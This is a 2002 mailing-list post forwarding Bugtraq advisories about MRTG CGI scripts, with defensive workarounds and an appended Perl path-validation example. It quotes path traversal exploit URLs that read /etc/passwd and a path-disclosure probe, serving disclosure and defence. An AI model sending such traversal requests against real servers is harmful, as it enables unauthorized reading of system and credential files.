[rrd-users] "vulnerabilities" in MRTG-related CGI scripts
Dave Plonka
plonka at doit.wisc.edu
Mon Feb 4 19:31:09 MET 2002
RRDTOOL/MRTG users,
[I haven't posted this to the MRTG list since I'm not on it...]
FYI, below I've included three "vulnerability" announcements regarding
MRTG and MRTG-related CGI scripts. These announcements were recently
posted to the very-popular, very-public "bugtraq" mailing list.
Regarding their validity, I tested an old "14all.cgi" script and
verified that it was possible to cause it to expose the first line
of public files, such as "/etc/passwd". (Whether or not you wish to
consider that a vulnerability is up to you.)
FWIW, my suggestion is to do one of the following if you are running
*any* common/popular CGI scripts that are not meant to be accessible to
the general public:
1) For private web servers (i.e. those not meant to be used by the
general public), implement a firewall policy to prevent HTTP
connections from arbitrary hosts.
2) For public web servers, use your web server software's
authentication features to restrict access to the CGI scripts.
3) For public web servers on which CGI scripts are meant to be used
only by those with explicit knowledge of them, give your CGI scripts
unusual names, so that someone probing for them by their default
names is unlikely to find them.
Lastly, please keep in mind that I did not report these vulnerabilities
(nor would I have done so without posting workarounds or fixes); I'm
just forwarding them to folks that might be interested. If you have
meaningful follow-ups please consider posting them to "bugtraq".
If you're not familiar with "bugtraq" here's the FAQ:
http://www.securityfocus.com/popups/forums/bugtraq/faq.shtml
Dave
P.S. Normally you can view the bugtraq archive here:
http://www.securityfocus.com/archive/1
but it currently seems out of date (so these new messages don't show
up there yet, although I have received them from the mailing list).
----- Forwarded message from UkR-XblP? <cuctema at ok.ru> -----
From: "UkR-XblP?" <cuctema at ok.ru>
Subject: new advisory
To: BUGTRAQ at securityfocus.com
X-Mailer: CommuniGate Pro Web Mailer v.3.5.2
Date: Sat, 02 Feb 2002 04:47:29 +0300
---=== UkR Security Team advisory ===---
Name : MRTG CGI script "show files" Vulnerability
About : The Multi Router Traffic Grapher (MRTG) is a tool to monitor the traffic load on network-links. MRTG generates HTML pages containing GIF images which provide a LIVE visual representation of this traffic
Product vendor: MRTG / http://www.mrtg.org
Problem : Problem lies in incorrect validation of user-submitted-by-browser information, that can show the first string of any file of the system where the script is installed.
Workaround : this will help somewhat : $input =~ s/[(\.\.)|\/]//g;
Author : UkR-XblP / UkR security team
Exploit :
http://www.target.com/cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd
http://www.target.com/cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
http://www.target.com/cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd
http://www.target.com/cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd
---
Professional hosting for everyone - http://www.host.ru
----- End forwarded message -----
----- Forwarded message from Tamer Sahin <ts at securityoffice.net> -----
From: "Tamer Sahin" <ts at securityoffice.net>
To: <bugtraq at securityfocus.com>
Subject: Mrtg Path Disclosure Vulnerability
Date: Mon, 4 Feb 2002 02:18:54 +0200
Organization: http://www.securityoffice.net
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Mrtg Path Disclosure Vulnerability
Type:
Input Validation Error
Release Date:
February 4, 2002
Product / Vendor:
The Multi Router Traffic Grapher (Mrtg) is a tool to monitor the
traffic load on network-links. Mrtg generates html pages containing
gif images which provide a live visual representation of this
traffic.
http://www.mrtg.org
Summary:
If an attacker submits a web request containing unexpected arguments
for script variables, an error message will be displayed containing
the path to the webroot directory of the server running the Mrtg cgi
script.
http://host/mrtg.cgi?cfg=blabla
Tested:
Mrtg v2.090011
Mrtg v2.090006
Vulnerable:
Mrtg v2.090011
Mrtg v2.090006
And maybe others.
Disclaimer:
http://www.securityoffice.net is not responsible for the misuse or
illegal use of any of the information and/or the software listed on
this security advisory.
Author:
Tamer Sahin
ts at securityoffice.net
http://www.securityoffice.net
Tamer Sahin
http://www.securityoffice.net
PGP Key ID: 0x2B5EDCB0 Fingerprint:
B96A 5DFC E0D9 D615 8D28 7A1B BB8B A453 2B5E DCB0
-----BEGIN PGP SIGNATURE-----
Version: PGP 7.1
iQA/AwUBPF3TbLuLpFMrXtywEQIU5QCghYmngYvhwveU+8W3JwTz5QtsmU0AoJZD
Tbl6HDhKVnFPEy1DSB3/q3AH
=+kUc
-----END PGP SIGNATURE-----
----- End forwarded message -----
----- Forwarded message from sj at datanet.hu -----
Date: Mon, 4 Feb 2002 12:05:47 +0100 (CET)
From: sj at datanet.hu
To: bugtraq at securityfocus.com
Subject: RE: new advisory
I think some filtering after the line '$q = new CGI;' would help a little,
e.g.
# fixed rejection message; double quotes so that \n is a real newline
my $SECMSG = "Pliz dont hekk us\n";
if(!defined $q->param('cfg')){ die "missing cfg file\n"; }
my $xx = $q->param('cfg');
# refuse "..", "//" and "./" anywhere in the name
if($xx =~ /\.\.|\/\/|\.\//){ die $SECMSG; }
# refuse any character outside [a-zA-Z0-9_-]; tr///dc returns the number deleted
if($xx =~ tr/a-zA-Z0-9_\-//dc){ die $SECMSG; }
you could also check the ownership of $cfgfile and deny opening
root (and maybe other) owned files.
>>Exploit :
>>
>>http://www.target.com/cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd
>>http://www.target.com/cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/passwd
>>http://www.target.com/cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/passwd
>>http://www.target.com/cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd
SJ.
----- End forwarded message -----
--
plonka at doit.wisc.edu http://net.doit.wisc.edu/~plonka ARS:N9HZF Madison, WI
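The filtering SJ sketches in the last forwarded message, carried through to a complete stand-alone Perl script that also canonicalises the resulting path and checks that it stays inside one configuration directory (the symlink case SJ's regexes do not cover). This is an added example, not code from MRTG, 14all.cgi or any of the posters; the config directory, the file names and the probe strings are constructed for the demonstration, and the "blabla" and "../../etc/passwd" probes mirror the two advisories above.

```perl
#!/usr/bin/perl
# Added example (not code from MRTG, 14all.cgi or the list posters):
# resolve a browser-supplied "cfg" name to a file strictly inside one
# configuration directory. $CFG_DIR and the file names are assumed.
use strict;
use warnings;
use Cwd qw(realpath);
use File::Spec;
use File::Temp qw(tempdir);

# A real CGI would hard-code its config directory; a temporary directory
# stands in for it here so the script runs anywhere.
my $CFG_DIR  = tempdir(CLEANUP => 1);
my $CFG_REAL = realpath($CFG_DIR);

# Returns ($path, undef) on success or (undef, $reason) on rejection.
# $reason is safe to send to the browser: it never echoes a path, which
# also avoids the path disclosure described in the second advisory.
sub resolve_cfg {
    my ($name) = @_;
    return (undef, 'missing cfg parameter')
        unless defined $name && length $name;

    # 1. Allow-list the name: letters, digits, "_", "-" and "." only, and
    #    it must end in ".cfg". Slashes and NUL bytes never get past this
    #    line, however the browser URL-encoded them.
    return (undef, 'cfg name contains disallowed characters')
        unless $name =~ /\A[A-Za-z0-9_][A-Za-z0-9_.-]*\.cfg\z/;

    # 2. Anchor it under the config directory and canonicalise. realpath
    #    follows symlinks and returns undef if the file does not exist.
    my $real = realpath(File::Spec->catfile($CFG_DIR, $name));
    return (undef, 'no such cfg') unless defined $real && -f $real;

    # 3. The canonical path must still be under the config directory; this
    #    rejects a symlink inside the directory that points elsewhere.
    return (undef, 'cfg resolves outside the config directory')
        unless index($real, "$CFG_REAL/") == 0;

    return ($real, undef);
}

sub write_file {
    my ($file, $text) = @_;
    open my $fh, '>', $file or die "cannot write $file: $!";
    print {$fh} $text;
    close $fh;
}

# --- Constructed fixtures: one legitimate config plus a symlink that
# --- escapes the directory (constructed for this example).
my $outside = tempdir(CLEANUP => 1);
write_file("$outside/secret.txt",  "not for the web\n");
write_file("$CFG_DIR/router1.cfg", "Target[r1]: 1:public\@router1\n");
symlink("$outside/secret.txt", "$CFG_DIR/link.cfg")
    or warn "symlink unsupported here; the link.cfg probe will read as missing\n";

# Probes modelled on the advisories, plus a symlink, a NUL-byte
# truncation attempt and a name that simply does not exist.
for my $probe ('router1.cfg',
               '../../../../../../../../etc/passwd',
               'blabla',
               'link.cfg',
               "router1.cfg\0.txt",
               'nosuch.cfg') {
    my ($path, $why) = resolve_cfg($probe);
    (my $shown = $probe) =~ s/\0/\\0/g;   # make the NUL byte visible
    printf "%-40s -> %s\n", $shown,
        defined $path ? "OK ($path)" : "rejected: $why";
}
```

Only router1.cfg resolves; every other probe is rejected with a reason that names the problem but not the file system layout. SJ's further suggestion, refusing root-owned files, can be added as a fourth step with `(stat $real)[4] == 0`, but it is left out here so the script behaves the same whichever user runs it.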